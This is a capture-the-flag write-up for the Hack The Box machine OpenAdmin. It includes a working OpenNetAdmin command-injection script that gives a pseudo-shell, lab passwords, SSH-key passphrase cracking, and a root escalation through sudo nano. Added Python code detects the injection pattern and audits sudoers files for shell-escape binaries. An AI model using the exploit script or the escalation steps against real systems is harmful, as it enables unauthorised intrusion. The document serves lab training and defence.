
Hello fellow hackers, today we are going to solve OpenAdmin from Hack The Box. It's a really interesting box, so let's get started!!!
As always, we start with nmap to check for open ports and services:
nmap -A -v -sT 10.10.0.171

So the box has two services running:
1- SSH on port 22
2- Apache web server on port 80
Let's check out the web server….

The default Apache page is there; let's check whether there are other pages or websites on the server…

After running gobuster against the web server I found two websites:
1- artwork
2- music

The websites are static, but when we try to log in on the music site, it redirects us to another page…. /ona !!!
Let's see what that is….

ONA (OpenNetAdmin) is a network management system, and after some googling I found a command-injection exploit for it on Exploit-DB…… let's try it out!!
#!/bin/bash
# OpenNetAdmin command-injection PoC from Exploit-DB, as used in this writeup.
# Usage: ./ona.sh http://TARGET/ona/   (gives an interactive pseudo-shell)
URL="${1}"
while true; do
    echo -n "$ "
    read cmd
    # The command is injected into the "ip" argument of the tooltips/ping action;
    # BEGIN/END markers let sed cut the command output out of the HTML response.
    curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" \
        | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
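From the blue-team side, the thing worth noticing in this exploit is that the ping action's "ip" argument is being fed a shell string instead of a host. The following is an added example written for this page (it is not part of the original writeup and not OpenNetAdmin's code) showing how a WAF rule or log-review script could flag that shape: it percent-decodes the POST body, pulls out the xajaxargs[] values, and rejects any ping target that is not a plain hostname or IP address. The three request bodies are constructed samples (one legitimate ping, the exploit's shape, and a percent-encoded variant), and the function names are my own.

```python
import re
from urllib.parse import parse_qs

# A ping target handed to ONA's tooltips/ping action should only ever be a
# hostname or IP address. Anything outside this set is worth a look.
HOST_OK = re.compile(r"^[A-Za-z0-9._:\-]*$")

# Metacharacters that let a second command ride along inside a shell string.
SHELL_META = re.compile(r"[;|&`\n]|\$\(|\$\{")


def classify_body(body):
    """Classify one url-encoded POST body sent to the ONA xajax endpoint.

    Returns {"suspicious": bool, "findings": [str, ...]}. parse_qs performs
    the percent-decoding, so %3B and a literal ';' are treated alike.
    """
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for arg in params.get("xajaxargs[]", []):
        if arg.startswith("ip=>"):
            target = arg[len("ip=>"):]
            if not HOST_OK.match(target):
                findings.append(f"ping target is not a host/IP: {target!r}")
        elif SHELL_META.search(arg):
            findings.append(f"shell metacharacter in xajax argument: {arg!r}")
    return {"suspicious": bool(findings), "findings": findings}


def scan_bodies(bodies):
    """Run classify_body over a sequence of bodies; return indexes of suspicious ones."""
    return [i for i, b in enumerate(bodies) if classify_body(b)["suspicious"]]


# Constructed sample bodies (not captured traffic): a legitimate ping of a
# host, the exploit shape used in the writeup, and a percent-encoded variant.
SAMPLE_BODIES = [
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E10.10.0.1&xajaxargs[]=ping",
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    '&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping',
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E10.10.0.1%3Bid&xajaxargs[]=ping",
]

if __name__ == "__main__":
    for i, body in enumerate(SAMPLE_BODIES):
        verdict = classify_body(body)
        print(i, "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["findings"])
```

Apache's default access log does not record POST bodies, so a check like this has to sit where the body is visible (a ModSecurity rule, a reverse proxy, or request logging turned on for the /ona/ path). Flagging requests is a stopgap; the real fix is running a patched OpenNetAdmin that validates the ping target instead of passing it to a shell.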

And it worked!!!! We have a shell as the www-data user.
After some enumeration we found two users:
1- joanna
2- jimmy
And after reading about ONA we found that the database credentials are stored in local/config/database_settings.inc.php

And we have a password: n1nj4W4rri0R! ….. let's try it with the users we have, over SSH

And we are in as jimmy….
Going back to /var/www/ we found a new folder called internal, owned by joanna, with three PHP files inside it:
1- index.php
2- main.php
3- logout.php

And we found something interesting in main.php: it runs a command that grabs joanna's SSH key…..

So we need to access this website internally.. let's use curl…
curl localhost/main.php
We couldn't access the site….. after some enumeration I found that the website is running on port 52846

Let's try now…
curl localhost:52846/main.php

And there you have it!! We have the SSH key for joanna.
Now let's try to crack the passphrase on the key,
using ssh2john.py from GitHub to convert the key into a hash that John the Ripper can crack.
Then we pass it to john with rockyou.txt as the wordlist.

And we cracked it!!! bloodninjas

And we are in as joanna….
Now for the root part.
joanna can run nano as root on the /opt/priv file:

sudo nano /opt/priv
With the help of GTFOBins we got a root shell from nano:
https://gtfobins.github.io/gtfobins/nano/
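The root step comes down to one sudoers line that hands a full editor to an unprivileged user, and GTFOBins lists plenty of binaries with the same problem. As an added example for this page (not part of the original writeup, and not a real tool from GTFOBins), here is a small sudoers auditor that parses user specifications and flags rules granting editors or pagers as root, suggesting sudoedit or NOEXEC instead. The sudoers content is constructed for the example; the joanna line mirrors the privilege the writeup describes but is not the box's real file, and all function names are my own.

```python
import os
import re

# Binaries whose interactive features let an unprivileged user spawn a root
# shell or write files as root; a short subset of the GTFOBins catalogue.
EDITORS = {"nano", "pico", "vi", "vim", "vim.basic", "vim.tiny", "emacs", "ed"}
PAGERS = {"less", "more", "man", "most"}

# user  host = (runas) [TAG: ...] command, command ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<spec>.+)$"
)
TAG_RE = re.compile(
    r"^(?:(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT"
    r"|LOG_OUTPUT|NOLOG_OUTPUT|FOLLOW|NOFOLLOW)\s*:\s*)+",
    re.IGNORECASE,
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_rule(line):
    """Parse one sudoers user specification; None for comments, Defaults, aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP_PREFIXES):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    commands, tags = [], set()
    for cmd in m.group("spec").split(","):
        cmd = cmd.strip()
        t = TAG_RE.match(cmd)
        if t:
            # Tags stick to every command that follows them on the line.
            tags = tags | {x.strip().upper() for x in t.group(0).split(":") if x.strip()}
            cmd = cmd[t.end():].strip()
        if cmd:
            commands.append({"path": cmd.split()[0], "tags": set(tags), "raw": cmd})
    return {"user": m.group("user"), "runas": m.group("runas") or "root", "commands": commands}


def audit_sudoers(text):
    """Return a list of findings for rules that hand out a shell-escape binary."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if not rule:
            continue
        for cmd in rule["commands"]:
            name = os.path.basename(cmd["path"])
            if name in EDITORS:
                reason = "editor can write any file and spawn a shell as root; use sudoedit"
            elif name in PAGERS and "NOEXEC" not in cmd["tags"]:
                reason = "pager can spawn a shell; add NOEXEC: or remove the rule"
            else:
                continue
            findings.append({"user": rule["user"], "runas": rule["runas"],
                             "binary": name, "rule": cmd["raw"], "reason": reason})
    return findings


# Constructed sudoers content (not the box's real file); the joanna line
# mirrors the privilege described in the writeup.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
deploy  ALL=(root) /usr/bin/systemctl restart nginx
ops     ALL=(ALL) NOEXEC: /usr/bin/less /var/log/syslog
helpdesk ALL=(ALL) /usr/bin/less /var/log/auth.log
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']} -> {f['runas']}: {f['rule']}  [{f['reason']}]")
```

Restricting nano to a single filename does not help, because the editor can still write out to any path and run commands from inside; sudoedit copies the file to a temporary location, opens it as the calling user, and writes it back only after the editor exits, which is the right way to grant "edit this one file as root". The auditor treats NOEXEC as mitigating only for pagers, since it blocks the shell escape but does nothing about an editor's ability to write files as root.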

SMT RedTeam